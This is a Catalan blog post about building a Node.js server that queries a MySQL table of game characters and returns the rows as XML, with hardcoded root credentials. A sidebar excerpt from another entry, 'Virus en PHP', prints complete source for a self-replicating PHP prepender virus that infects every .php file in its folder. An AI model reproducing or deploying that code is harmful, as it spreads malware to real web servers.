Ves al contingut principal

De moment, el tamany si importa, o almenys la potència

He tingut que canviar d'equip per a la programació de la base de dades. He gastat mysql. No és què el gestor de bases de dades siga molt exigent. El problema que he tingut és amb el client que han elaborat Mysql Workbench. Em fa gossera buscar un altre i este és el·laborat pels mateixos que fan Mysql. He canviat al fix i problema resolt ;)
Doncs be, el client al meu portàtil reciclat es queda penjat continuament (més que l'eclipse, què ja és dir), trobe que per a fer desenvolupament una mica seriosos no podré gastar-lo i hauré de canviar de màquina. Ja veurem que em duu el destí.
De moment he dissenyat la super base de dades (mode ironia on) que gastaran les aplicacions mòvils. Consistirà en una taula única de personatges d'un joc de rol molt simple:


En pròximes entrades aniré utilitzant esta taula, la idea és que el servidor la retorne a  una aplicació client als diferents dispositius mòvils.

Una vegada completada la base de dades (mode ironia on), anem a programar el servidor node.js, per defecte no té els drivers de mysql instal·lats, per tant haurem d'instal·lar-los:

 npm install mysql


Després programem el servidor, com ja haureu fet alguna vegada alguna cosa similar, no caldrà què m'explaie massa, és a dir:
1. Configurem la connexió
2. Executem la consulta
3. Mostrem resultats/errors

Ací tenim un exemple.

var Client = require('mysql').Client,
    client = new Client();
    client.user = 'root';
    client.password = 'root';
    client.host='127.0.0.1';
    client.port='3306';
    client.database='proves'
   
    client.query(
        'SELECT * FROM personatges',
        function selectPlayers(err, results, fields) {
            if (err) {
                console.log("Error: " + err.message);
                throw err;
            }
   
            console.log("Total de resultats: "+results.length);
            console.log(results);
            client.end();
        });


I esta seria la informació mostrada:






Molt bé! Funciona la consola, però el que volem no és això, si no enviar-li al client que s'ha connectat (navegador, app mòvil...) la informació, preferentment en un format manipulable, per exemple xml. Haurem de jungar el programa anterior, este i fer unes modificacions ;):
 var http = require("http");


var Client = require('mysql').Client,
        client = new Client();
        client.user = 'root';
        client.password = 'root';
        client.host='127.0.0.1';
        client.port='3306';
        client.database='proves';


http.createServer(function (request, response) {
  //Capturem el final de la petició, i creem una funció que escriurà el missatge
   request.on("end", function () {
      // El codi 200 vol dir què la petició ha segut correcta, i enviem la resposta en text pla.
      response.writeHead(200, {
         'Content-Type': 'text/plain'
      });
      // Enviem la resposta
    var res;
    client.query(
            'SELECT * FROM personatges',
            function selectPlayers(err, results, fields) {
                if (err) {
                    console.log("Error: " + err.message);
                        throw err;
                }
       
                console.log("Total de resultats: "+results.length);
                console.log(results);
            response.end("Total de resultats: "+results.length);
          
                client.end();
            });//final query
      //response.end(res);
   });
// Escoltem el port 1000
}).listen(1000);













Ara només ens faltarà manipular el resultat i tornar-lo en el format dessitjat:

var http = require("http");


var Client = require('mysql').Client,
        client = new Client();
        client.user = 'root';
        client.password = 'root';
        client.host='127.0.0.1';
        client.port='3306';
        client.database='proves';

//Creem el servidor, i quan "s'acabe" la petició, enviem al client la resposta, el missatge "<xml> <resposta>OK</resposta></xml>"
http.createServer(function (request, response) {
  //Capturem el final de la petició, i creem una funció que escriurà el missatge
   request.on("end", function () {
      // El codi 200 vol dir què la petició ha segut correcta, i enviem la resposta en text pla.
      response.writeHead(200, {
         'Content-Type': 'text/plain'
      });
      // Enviem la resposta
    var res;
    client.query(
            'SELECT * FROM personatges',
            function selectPlayers(err, results, fields) {
                if (err) {
                    console.log("Error: " + err.message);
                        throw err;
                }
            res="<xml><resposta><personatges>"
                console.log("Total de resultats: "+results.length);
                for(i=0;i<results.length;i++){
               res+="<personatge>";
      

               res+="<id>"+results[i].id+"</id>";
               res+="<nom>"+results[i].nom+"</nom>";
               res+="<classe>"+results[i].classe+"</classe>";
               res+="<nivell>"+results[i].nivell+"</nivell>";

               res+="</personatge>";
            }
            res+="</personatges></resposta></xml>";
            response.end(res);
                client.end();
            });//final query
      //response.end(res);
   });
// Escoltem el port 1000
}).listen(1000);

Segur que hi ha una classe per tornar el vector de respostes en .xml, però per a esta aplicació em costava més l'espart que l'escurada, vegem el resultat al navegador:


Podem observar que potser caldria donar-li un poc d'estètica a l'xml, posar retorns de carro, capçaleres xml correctes... però de moment, per a les proves que estic fent sobra ;)



Comentaris

Entrades populars d'aquest blog

Parlem de Bloc i País?

Comence una nova etapa en el tema polític, de fet ja fa temps que la vaig començar, però ara ho fet involucrant-me activament als assumptes interns del meu partit. Em defineix a mi mateix com una persona activa (de vegades inclús hiperactiva), amb inquietuds i preocupacions, en definitiva, em mou les ganes de ser útil a la meua gent i l’estima pel meu país. Aquestes voluntats però, no les he vistes, o almenys, ja no les veig tan a sovint en el tarannà del meu partit. No negaré que, potser, tinc desavinences en l’actual línia de la direcció (allò que s’ha anomenat com el “aparato”), però la casuística dels últims viratges polítics no han deixat lloc a altra possibilitat. No vaig a repetir totes les actuacions que adés i ara van demostrar que els abanderats de la nova política no es comportaren com a tal. Tots sabem quines són. Però d'una si que en parlaré, una que per a mi fou bastant reiterativa i té molta relació en un dels principis de Goebbels, que és el de fer creure que la di…

Què poden(m) fer els polítics nacionalistes valencians?

Davant del procés que s'ha encetat a Catalunya, el primer que m'agradaria és mostrar el meu suport. Pot ser s'hagen fet errors, com en tot en esta vida. Ara bé, votar no pot ser mai antidemocràtic, i per tant el seu destí els decidiran ells. 
Alguns hem observat, sempre amb il·lusió, que pot ser després d'ells anem nosaltres, els valencians. Però la realitat és tossuda. Mai hem tingut un sentiment nacionalista similar als catalans. I, possiblement, mentre no fem alguna cosa per canviar-ho, no el tindrem. Per exemple, podem veure l'evolució  segons el CIS del sentiment nacionalista/independentista valencià i català:

Durant els primers anys (94 i 97) es codificava del 0 al 10, però al 2005, preguntaren allò de "sólo español" (que ho he codificat com un 2), "más español que (gentilicio)" (que será un 4),  "igual español que (gentilicio)" (que serà un 6),  "más (gentilicio) que español" (que serà un 8) i "sólamente (gentilicio…

Virus en PHP

Acabe de trobar un exemple simple de virus en PHP, m'he quedat flipat de la sensillesa, és clavat als virus.bat de MS-DOS:
1. Busca tots els .php de la carpeta
2. Si no està infectat:
  2.1 Escriu el contingut de la part del virus (anomenada prepender, 391 bytes) a l'inicio de l'arxiu
  2.2 busca el següent arxiu i ves al punt dos


Pareix simple i el codi la veritat és que ho demostra:

- - - - - - - - - - - - - [ PHP Prepender Virus Example ] - - - - - - - - - - - - - <?php // SPTH $string=fread(fopen(__FILE__,'r'), 391); $curdir=opendir('.'); while ($file = readdir($curdir)) { if (strstr($file, '.php')) { $victim=fopen($file, 'r+'); if (!strstr(fread($victim, 13), 'SPTH')) { rewind($victim); fwrite($victim, $string.fread($victim, filesize($file));); } fclose($victim); } } closedir($curdir); ?>